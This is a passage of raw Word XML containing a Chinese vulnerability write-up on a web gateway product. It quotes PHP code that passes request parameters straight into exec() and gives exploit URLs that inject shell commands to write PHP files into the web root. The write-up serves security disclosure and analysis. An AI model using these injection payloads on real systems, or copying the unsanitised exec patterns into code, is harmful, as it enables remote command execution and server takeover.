                    <w:t>$str = "ipset -A drop_user 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ip.",".$duration;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9841" type="#_x0000_t202" style="width:337.5pt;height:83.4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>$str);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62" w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="1095" w:right="2506"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$n</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ame = "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>禁止上网用户</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:"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ip; writeSysLog($name);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="44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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="99"/>
        <w:ind w:left="417" w:right="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>$ip = $_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>REQUEST[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>'ip'];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>$str = "ipset -A drop_user "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>ip;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>exec(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>$str);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="19" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>直接执行命令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1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:ind w:right="2342"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9840" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:37.4pt;width:337.5pt;height:295.35pt;z-index:376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微软雅黑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>"ipset -nL drop_user", $drop_user);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573" w:firstLine="914"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$identifier = htmlobject_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>request(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'identifier');</w:t>
                  </w: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$identifier == '') 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 xml:space="preserve">$identifier = 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 w:line="319" w:lineRule="auto"/>
                    <w:ind w:left="2012" w:right="935" w:hanging="917"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>switch</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> (htmlobject_request('action')) { case '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>允许上网</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>':</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="41"/>
                    <w:ind w:left="1076" w:right="641"/>
                    <w:jc w:val="center"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>for(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$i = 0;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$i&lt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>count(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$identifier); $i++){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>"ipset -D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drop_user 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identifier[$i]);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62" w:line="283" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="203" w:firstLine="3662"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$name = "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>禁止上网用户列表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中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允许上网的</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-60"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>IP:"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identifier[$i];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="73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writeSysLog(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$name);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t>第二处命令执行：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>/base//sta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>ts/realtime/underLineUser.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:p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231"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:spacing w:val="-49"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s9839" type="#_x0000_t202" style="width:337.5pt;height:99.7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before="1" w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="213" w:firstLine="914"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>print(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"&lt;script&gt;window.location.href='underLin eUser.php';&lt;/script&gt;");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2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line="278" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:t>看代码里面：</w:t>
      </w:r>
      <w:r>
        <w:t>$identifier =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>htmlobject_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'identifier');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="352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然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$identifier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> exec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>里面了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跟进</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> htmlobject_request </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="16"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9838" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:17.6pt;width:337.5pt;height:132.35pt;z-index:380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"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑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htmlobject_request($arg)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(isset($_REQUEST[$arg]))</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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$_REQUEST[$arg];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076" w:right="761"/>
                    <w:jc w:val="center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'';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rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="323" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不懂那这个函数来干啥用的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3"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s9822" style="position:absolute;left:0;text-align:left;margin-left:80.45pt;margin-top:38.2pt;width:338pt;height:42.1pt;z-index:3856;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1609,764" coordsize="6760,842">
            <v:rect id="_x0000_s9837" style="position:absolute;left:1617;top:772;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9836" style="position:absolute;left:1797;top:1015;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9835" style="position:absolute" from="1612,769" to="8366,769" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9834" style="position:absolute" from="1614,767" to="1614,1278" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9833" style="position:absolute" from="8364,772" to="8364,1278" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9832" style="position:absolute;left:1617;top:1278;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9831" style="position:absolute;left:1797;top:1311;width:1566;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9830" style="position:absolute;left:3363;top:1311;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9829" style="position:absolute;left:4163;top:1311;width:2651;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9828" style="position:absolute;left:6814;top:1311;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9827" style="position:absolute;left:6935;top:1311;width:723;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9826" style="position:absolute;left:7658;top:1311;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9825" style="position:absolute" from="1614,1278" to="1614,1604" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9824" style="position:absolute" from="8364,1278" to="8364,1604" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s9823" type="#_x0000_t202" style="position:absolute;left:1614;top:769;width:6750;height:835" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="105" w:line="340" w:lineRule="atLeast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 xml:space="preserve">https://**.**.**.**/base/stats/realtime/underLineUse </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>r.php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?action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允许上网</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>&amp;identifier[]=123;echo '&lt;?php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微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>还是参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$identifier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的值直接进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，一样暴力的命令执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> EXP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="229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group id="_x0000_s9811" style="width:338pt;height:42.1pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6760,842">
            <v:rect id="_x0000_s9821" style="position:absolute;left:8;top:3;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9820" style="position:absolute;left:188;top:66;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9819" style="position:absolute" from="5,3" to="5,328" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9818" style="position:absolute" from="6755,3" to="6755,328" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9817" style="position:absolute;left:8;top:328;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9816" style="position:absolute;left:188;top:392;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9815" style="position:absolute" from="3,837" to="6757,837" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9814" style="position:absolute" from="5,328" to="5,839" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9813" style="position:absolute" from="6755,328" to="6755,839" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s9812" type="#_x0000_t202" style="position:absolute;left:5;top:3;width:6750;height:835" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="64" w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="183" w:right="52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phpinfo(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);?&gt;'&gt;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 xml:space="preserve">/usr/local/WholetonTM/htdocs/111111.ph  </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>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2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9810" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.25pt;width:337.5pt;height:132.35pt;z-index:3952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127"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$ssl_dir = "/usr/local/WholetonTM/triton/conf/URL/ssl/";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$id =$_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>REQUEST[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'id'];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3416"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>exec</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ("rm ".$ssl_dir.$id); ECHO "rm ".$ssl_dir.$id;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文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>/base/tpl/delectSSLL.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="21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9809" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.2pt;width:337.5pt;height:50.85pt;z-index:397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 xml:space="preserve">https://**.**.**.**/base/tpl/delectSSLL.php?id=;echo </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'333333'&gt;/usr/local/WholetonTM/htdocs/333333.php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</w:rPr>
        <w:t>这里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Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可控，直接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入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exec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行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10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="3263"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行：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  <w:w w:val="95"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>/base/vpn/download_nodes.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9808" type="#_x0000_t202" style="position:absolute;margin-left:80.7pt;margin-top:15.85pt;width:337.5pt;height:197.55pt;z-index:400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$upload_dir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";", "",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REQUEST[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'file</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>']);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$upload_file = "nodes";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1757"/>
                      <w:tab w:val="left" w:pos="2177"/>
                    </w:tabs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$fp</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>fopen(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$upload_dir.$upload_file,</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-10"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"r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");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998" w:firstLine="914"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Header(</w:t>
                  </w:r>
